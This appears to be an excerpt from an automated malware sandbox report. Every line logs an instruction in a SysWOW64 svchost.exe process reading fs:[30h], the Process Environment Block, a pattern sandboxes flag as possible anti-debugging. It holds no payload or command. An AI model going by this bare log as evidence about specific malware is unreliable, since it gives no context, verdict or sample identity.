Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0314260B mov eax, dword ptr fs:[00000030h]	2_2_0314260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0314260B mov eax, dword ptr fs:[00000030h]	2_2_0314260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0314260B mov eax, dword ptr fs:[00000030h]	2_2_0314260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0314260B mov eax, dword ptr fs:[00000030h]	2_2_0314260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0314260B mov eax, dword ptr fs:[00000030h]	2_2_0314260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0314260B mov eax, dword ptr fs:[00000030h]	2_2_0314260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0314260B mov eax, dword ptr fs:[00000030h]	2_2_0314260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0314E627 mov eax, dword ptr fs:[00000030h]	2_2_0314E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03166620 mov eax, dword ptr fs:[00000030h]	2_2_03166620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03168620 mov eax, dword ptr fs:[00000030h]	2_2_03168620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0313262C mov eax, dword ptr fs:[00000030h]	2_2_0313262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0314C640 mov eax, dword ptr fs:[00000030h]	2_2_0314C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03162674 mov eax, dword ptr fs:[00000030h]	2_2_03162674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031F866E mov eax, dword ptr fs:[00000030h]	2_2_031F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031F866E mov eax, dword ptr fs:[00000030h]	2_2_031F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0316A660 mov eax, dword ptr fs:[00000030h]	2_2_0316A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0316A660 mov eax, dword ptr fs:[00000030h]	2_2_0316A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03134690 mov eax, dword ptr fs:[00000030h]	2_2_03134690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03134690 mov eax, dword ptr fs:[00000030h]	2_2_03134690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031666B0 mov eax, dword ptr fs:[00000030h]	2_2_031666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0316C6A6 mov eax, dword ptr fs:[00000030h]	2_2_0316C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0316A6C7 mov ebx, dword ptr fs:[00000030h]	2_2_0316A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0316A6C7 mov eax, dword ptr fs:[00000030h]	2_2_0316A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_031AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_031AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_031AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_031AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031B06F1 mov eax, dword ptr fs:[00000030h]	2_2_031B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031B06F1 mov eax, dword ptr fs:[00000030h]	2_2_031B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031C6500 mov eax, dword ptr fs:[00000030h]	2_2_031C6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03204500 mov eax, dword ptr fs:[00000030h]	2_2_03204500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03204500 mov eax, dword ptr fs:[00000030h]	2_2_03204500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03204500 mov eax, dword ptr fs:[00000030h]	2_2_03204500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03204500 mov eax, dword ptr fs:[00000030h]	2_2_03204500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03204500 mov eax, dword ptr fs:[00000030h]	2_2_03204500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03204500 mov eax, dword ptr fs:[00000030h]	2_2_03204500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03204500 mov eax, dword ptr fs:[00000030h]	2_2_03204500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03140535 mov eax, dword ptr fs:[00000030h]	2_2_03140535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03140535 mov eax, dword ptr fs:[00000030h]	2_2_03140535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03140535 mov eax, dword ptr fs:[00000030h]	2_2_03140535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03140535 mov eax, dword ptr fs:[00000030h]	2_2_03140535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03140535 mov eax, dword ptr fs:[00000030h]	2_2_03140535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03140535 mov eax, dword ptr fs:[00000030h]	2_2_03140535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0315E53E mov eax, dword ptr fs:[00000030h]	2_2_0315E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0315E53E mov eax, dword ptr fs:[00000030h]	2_2_0315E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0315E53E mov eax, dword ptr fs:[00000030h]	2_2_0315E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0315E53E mov eax, dword ptr fs:[00000030h]	2_2_0315E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0315E53E mov eax, dword ptr fs:[00000030h]	2_2_0315E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03138550 mov eax, dword ptr fs:[00000030h]	2_2_03138550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03138550 mov eax, dword ptr fs:[00000030h]	2_2_03138550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0316656A mov eax, dword ptr fs:[00000030h]	2_2_0316656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0316656A mov eax, dword ptr fs:[00000030h]	2_2_0316656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0316656A mov eax, dword ptr fs:[00000030h]	2_2_0316656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0316E59C mov eax, dword ptr fs:[00000030h]	2_2_0316E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03132582 mov eax, dword ptr fs:[00000030h]	2_2_03132582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03132582 mov ecx, dword ptr fs:[00000030h]	2_2_03132582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03164588 mov eax, dword ptr fs:[00000030h]	2_2_03164588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031545B1 mov eax, dword ptr fs:[00000030h]	2_2_031545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031545B1 mov eax, dword ptr fs:[00000030h]	2_2_031545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031B05A7 mov eax, dword ptr fs:[00000030h]	2_2_031B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031B05A7 mov eax, dword ptr fs:[00000030h]	2_2_031B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031B05A7 mov eax, dword ptr fs:[00000030h]	2_2_031B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031365D0 mov eax, dword ptr fs:[00000030h]	2_2_031365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0316A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0316A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0316A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0316A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0316E5CF mov eax, dword ptr fs:[00000030h]	2_2_0316E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0316E5CF mov eax, dword ptr fs:[00000030h]	2_2_0316E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0315E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0315E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0315E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0315E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0315E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0315E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0315E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0315E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0315E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0315E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0315E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0315E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0315E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0315E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0315E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0315E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031325E0 mov eax, dword ptr fs:[00000030h]	2_2_031325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0316C5ED mov eax, dword ptr fs:[00000030h]	2_2_0316C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0316C5ED mov eax, dword ptr fs:[00000030h]	2_2_0316C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03168402 mov eax, dword ptr fs:[00000030h]	2_2_03168402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03168402 mov eax, dword ptr fs:[00000030h]	2_2_03168402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03168402 mov eax, dword ptr fs:[00000030h]	2_2_03168402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0316A430 mov eax, dword ptr fs:[00000030h]	2_2_0316A430
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0312E420 mov eax, dword ptr fs:[00000030h]	2_2_0312E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0312E420 mov eax, dword ptr fs:[00000030h]	2_2_0312E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0312E420 mov eax, dword ptr fs:[00000030h]	2_2_0312E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0312C427 mov eax, dword ptr fs:[00000030h]	2_2_0312C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031B6420 mov eax, dword ptr fs:[00000030h]	2_2_031B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031B6420 mov eax, dword ptr fs:[00000030h]	2_2_031B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031B6420 mov eax, dword ptr fs:[00000030h]	2_2_031B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031B6420 mov eax, dword ptr fs:[00000030h]	2_2_031B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031B6420 mov eax, dword ptr fs:[00000030h]	2_2_031B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031B6420 mov eax, dword ptr fs:[00000030h]	2_2_031B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031B6420 mov eax, dword ptr fs:[00000030h]	2_2_031B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031EA456 mov eax, dword ptr fs:[00000030h]	2_2_031EA456
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0312645D mov eax, dword ptr fs:[00000030h]	2_2_0312645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0315245A mov eax, dword ptr fs:[00000030h]	2_2_0315245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0316E443 mov eax, dword ptr fs:[00000030h]	2_2_0316E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0316E443 mov eax, dword ptr fs:[00000030h]	2_2_0316E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0316E443 mov eax, dword ptr fs:[00000030h]	2_2_0316E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0316E443 mov eax, dword ptr fs:[00000030h]	2_2_0316E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0316E443 mov eax, dword ptr fs:[00000030h]	2_2_0316E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0316E443 mov eax, dword ptr fs:[00000030h]	2_2_0316E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0316E443 mov eax, dword ptr fs:[00000030h]	2_2_0316E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0316E443 mov eax, dword ptr fs:[00000030h]	2_2_0316E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0315A470 mov eax, dword ptr fs:[00000030h]	2_2_0315A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0315A470 mov eax, dword ptr fs:[00000030h]	2_2_0315A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0315A470 mov eax, dword ptr fs:[00000030h]	2_2_0315A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031BC460 mov ecx, dword ptr fs:[00000030h]	2_2_031BC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031EA49A mov eax, dword ptr fs:[00000030h]	2_2_031EA49A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031644B0 mov ecx, dword ptr fs:[00000030h]	2_2_031644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031BA4B0 mov eax, dword ptr fs:[00000030h]	2_2_031BA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031364AB mov eax, dword ptr fs:[00000030h]	2_2_031364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031304E5 mov ecx, dword ptr fs:[00000030h]	2_2_031304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031AEB1D mov eax, dword ptr fs:[00000030h]	2_2_031AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031AEB1D mov eax, dword ptr fs:[00000030h]	2_2_031AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031AEB1D mov eax, dword ptr fs:[00000030h]	2_2_031AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031AEB1D mov eax, dword ptr fs:[00000030h]	2_2_031AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031AEB1D mov eax, dword ptr fs:[00000030h]	2_2_031AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031AEB1D mov eax, dword ptr fs:[00000030h]	2_2_031AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031AEB1D mov eax, dword ptr fs:[00000030h]	2_2_031AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031AEB1D mov eax, dword ptr fs:[00000030h]	2_2_031AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031AEB1D mov eax, dword ptr fs:[00000030h]	2_2_031AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03204B00 mov eax, dword ptr fs:[00000030h]	2_2_03204B00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0315EB20 mov eax, dword ptr fs:[00000030h]	2_2_0315EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0315EB20 mov eax, dword ptr fs:[00000030h]	2_2_0315EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031F8B28 mov eax, dword ptr fs:[00000030h]	2_2_031F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031F8B28 mov eax, dword ptr fs:[00000030h]	2_2_031F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03128B50 mov eax, dword ptr fs:[00000030h]	2_2_03128B50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031DEB50 mov eax, dword ptr fs:[00000030h]	2_2_031DEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031E4B4B mov eax, dword ptr fs:[00000030h]	2_2_031E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031E4B4B mov eax, dword ptr fs:[00000030h]	2_2_031E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031C6B40 mov eax, dword ptr fs:[00000030h]	2_2_031C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031C6B40 mov eax, dword ptr fs:[00000030h]	2_2_031C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031D8B42 mov eax, dword ptr fs:[00000030h]	2_2_031D8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031FAB40 mov eax, dword ptr fs:[00000030h]	2_2_031FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0312CB7E mov eax, dword ptr fs:[00000030h]	2_2_0312CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03202B57 mov eax, dword ptr fs:[00000030h]	2_2_03202B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03202B57 mov eax, dword ptr fs:[00000030h]	2_2_03202B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03202B57 mov eax, dword ptr fs:[00000030h]	2_2_03202B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03202B57 mov eax, dword ptr fs:[00000030h]	2_2_03202B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03140BBE mov eax, dword ptr fs:[00000030h]	2_2_03140BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03140BBE mov eax, dword ptr fs:[00000030h]	2_2_03140BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031E4BB0 mov eax, dword ptr fs:[00000030h]	2_2_031E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031E4BB0 mov eax, dword ptr fs:[00000030h]	2_2_031E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031DEBD0 mov eax, dword ptr fs:[00000030h]	2_2_031DEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03150BCB mov eax, dword ptr fs:[00000030h]	2_2_03150BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03150BCB mov eax, dword ptr fs:[00000030h]	2_2_03150BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03150BCB mov eax, dword ptr fs:[00000030h]	2_2_03150BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03130BCD mov eax, dword ptr fs:[00000030h]	2_2_03130BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03130BCD mov eax, dword ptr fs:[00000030h]	2_2_03130BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03130BCD mov eax, dword ptr fs:[00000030h]	2_2_03130BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03138BF0 mov eax, dword ptr fs:[00000030h]	2_2_03138BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03138BF0 mov eax, dword ptr fs:[00000030h]	2_2_03138BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03138BF0 mov eax, dword ptr fs:[00000030h]	2_2_03138BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0315EBFC mov eax, dword ptr fs:[00000030h]	2_2_0315EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031BCBF0 mov eax, dword ptr fs:[00000030h]	2_2_031BCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031BCA11 mov eax, dword ptr fs:[00000030h]	2_2_031BCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03154A35 mov eax, dword ptr fs:[00000030h]	2_2_03154A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03154A35 mov eax, dword ptr fs:[00000030h]	2_2_03154A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0316CA38 mov eax, dword ptr fs:[00000030h]	2_2_0316CA38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0316CA24 mov eax, dword ptr fs:[00000030h]	2_2_0316CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0315EA2E mov eax, dword ptr fs:[00000030h]	2_2_0315EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03136A50 mov eax, dword ptr fs:[00000030h]	2_2_03136A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03136A50 mov eax, dword ptr fs:[00000030h]	2_2_03136A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03136A50 mov eax, dword ptr fs:[00000030h]	2_2_03136A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03136A50 mov eax, dword ptr fs:[00000030h]	2_2_03136A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03136A50 mov eax, dword ptr fs:[00000030h]	2_2_03136A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03136A50 mov eax, dword ptr fs:[00000030h]	2_2_03136A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03136A50 mov eax, dword ptr fs:[00000030h]	2_2_03136A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03140A5B mov eax, dword ptr fs:[00000030h]	2_2_03140A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03140A5B mov eax, dword ptr fs:[00000030h]	2_2_03140A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031ACA72 mov eax, dword ptr fs:[00000030h]	2_2_031ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031ACA72 mov eax, dword ptr fs:[00000030h]	2_2_031ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0316CA6F mov eax, dword ptr fs:[00000030h]	2_2_0316CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0316CA6F mov eax, dword ptr fs:[00000030h]	2_2_0316CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0316CA6F mov eax, dword ptr fs:[00000030h]	2_2_0316CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031DEA60 mov eax, dword ptr fs:[00000030h]	2_2_031DEA60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03168A90 mov edx, dword ptr fs:[00000030h]	2_2_03168A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0313EA80 mov eax, dword ptr fs:[00000030h]	2_2_0313EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0313EA80 mov eax, dword ptr fs:[00000030h]	2_2_0313EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0313EA80 mov eax, dword ptr fs:[00000030h]	2_2_0313EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0313EA80 mov eax, dword ptr fs:[00000030h]	2_2_0313EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0313EA80 mov eax, dword ptr fs:[00000030h]	2_2_0313EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0313EA80 mov eax, dword ptr fs:[00000030h]	2_2_0313EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0313EA80 mov eax, dword ptr fs:[00000030h]	2_2_0313EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0313EA80 mov eax, dword ptr fs:[00000030h]	2_2_0313EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0313EA80 mov eax, dword ptr fs:[00000030h]	2_2_0313EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03204A80 mov eax, dword ptr fs:[00000030h]	2_2_03204A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03138AA0 mov eax, dword ptr fs:[00000030h]	2_2_03138AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03138AA0 mov eax, dword ptr fs:[00000030h]	2_2_03138AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03186AA4 mov eax, dword ptr fs:[00000030h]	2_2_03186AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03130AD0 mov eax, dword ptr fs:[00000030h]	2_2_03130AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03164AD0 mov eax, dword ptr fs:[00000030h]	2_2_03164AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03164AD0 mov eax, dword ptr fs:[00000030h]	2_2_03164AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03186ACC mov eax, dword ptr fs:[00000030h]	2_2_03186ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03186ACC mov eax, dword ptr fs:[00000030h]	2_2_03186ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03186ACC mov eax, dword ptr fs:[00000030h]	2_2_03186ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0316AAEE mov eax, dword ptr fs:[00000030h]	2_2_0316AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0316AAEE mov eax, dword ptr fs:[00000030h]	2_2_0316AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031BC912 mov eax, dword ptr fs:[00000030h]	2_2_031BC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03128918 mov eax, dword ptr fs:[00000030h]	2_2_03128918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03128918 mov eax, dword ptr fs:[00000030h]	2_2_03128918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031AE908 mov eax, dword ptr fs:[00000030h]	2_2_031AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031AE908 mov eax, dword ptr fs:[00000030h]	2_2_031AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031B892A mov eax, dword ptr fs:[00000030h]	2_2_031B892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031C892B mov eax, dword ptr fs:[00000030h]	2_2_031C892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031B0946 mov eax, dword ptr fs:[00000030h]	2_2_031B0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03204940 mov eax, dword ptr fs:[00000030h]	2_2_03204940
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031D4978 mov eax, dword ptr fs:[00000030h]	2_2_031D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031D4978 mov eax, dword ptr fs:[00000030h]	2_2_031D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031BC97C mov eax, dword ptr fs:[00000030h]	2_2_031BC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03156962 mov eax, dword ptr fs:[00000030h]	2_2_03156962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03156962 mov eax, dword ptr fs:[00000030h]	2_2_03156962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03156962 mov eax, dword ptr fs:[00000030h]	2_2_03156962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0317096E mov eax, dword ptr fs:[00000030h]	2_2_0317096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0317096E mov edx, dword ptr fs:[00000030h]	2_2_0317096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0317096E mov eax, dword ptr fs:[00000030h]	2_2_0317096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031B89B3 mov esi, dword ptr fs:[00000030h]	2_2_031B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031B89B3 mov eax, dword ptr fs:[00000030h]	2_2_031B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031B89B3 mov eax, dword ptr fs:[00000030h]	2_2_031B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031429A0 mov eax, dword ptr fs:[00000030h]	2_2_031429A0
